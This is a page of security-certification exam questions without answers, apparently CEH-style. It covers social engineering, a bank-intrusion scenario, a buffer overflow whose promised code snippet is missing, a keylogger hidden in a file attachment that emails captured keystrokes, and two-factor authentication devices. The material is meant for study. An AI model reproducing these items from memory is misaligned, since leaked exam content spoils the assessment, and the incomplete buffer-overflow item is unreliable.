PrepAway - Latest Free Exam Questions & Answers

Author: seenagape

What is Peter Smith talking about?

You went to great lengths to install all the necessary technologies to prevent hacking attacks,
such as expensive firewalls, antivirus software, anti-spam systems and intrusion
detection/prevention tools in your company's network. You have configured the most secure
policies and tightened every device on your network. You are confident that hackers will never be
able to gain access to your network with such a complex security system in place. Your peer, Peter Smith,
who works in the same department, disagrees with you. He says even the best network security
technologies cannot prevent hackers from gaining access to the network because of the presence of a
"weakest link" in the security chain. What is Peter Smith talking about?

How would you proceed?

You are trying to break into a highly classified top-secret mainframe computer with the highest security
system in place at Merclyn Barley Bank, located in Los Angeles. You know that conventional
hacking doesn't work in this case, because organizations such as banks are generally tight and
secure when it comes to protecting their systems. In other words, you are trying to penetrate an
otherwise impenetrable system. How would you proceed?

How can you protect/fix the problem of your application as shown above?

Buffer X in an Accounting application module for Brownies Inc. can contain 200 characters. The
programmer makes an assumption that 200 characters are more than enough. Because there
were no proper boundary checks being conducted, Bob decided to insert 400 characters into the
200-character buffer (which overflows the buffer). Below is the code snippet:

How can you protect/fix the problem of your application as shown above?

What technique has Michael used to disguise this keylogging software?

Michael is a junior security analyst at the National Security Agency (NSA), working
primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use
to decipher encrypted messages, including Government Access to Keys (GAK) and inside
informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the
Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use
custom-built algorithms or obscure algorithms purchased from corrupt governments. For this
reason, Michael and other security analysts like him have been forced to find different methods of
deciphering terrorist messages. One method that Michael thought of using was to hide malicious
code inside seemingly harmless programs. Michael first monitors sites and bulletin boards used by
known terrorists, and then he is able to glean the email addresses of some of these suspected
terrorists. Michael then inserts a stealth keylogger into a mapping program file readme.txt and then
sends that as an attachment to the terrorist. This keylogger takes screenshots every 2 minutes
and also logs all keyboard activity into a hidden file on the terrorist's computer. Then, the
keylogger emails those files to Michael twice a day with a built-in SMTP server. What technique
has Michael used to disguise this keylogging software?

What type of device should Joseph use for two-factor authentication?

Joseph has just been hired by a contractor company of the Department of Defense as their
Senior Security Analyst. Joseph has been instructed on the company's strict security policies that
have been implemented, and the policies that have yet to be put in place. Per the Department of
Defense, all DoD users and the users of their contractors must use two-factor authentication to
access their networks. Joseph has been delegated the task of researching and implementing the
best two-factor authentication method for his company. Joseph's supervisor has told him that they
would like to use some type of hardware device in tandem with a security or identifying PIN
number. Joseph's company has already researched using smart cards and all the resources
needed to implement them, but found the smart cards not to be cost-effective. What type of device
should Joseph use for two-factor authentication?

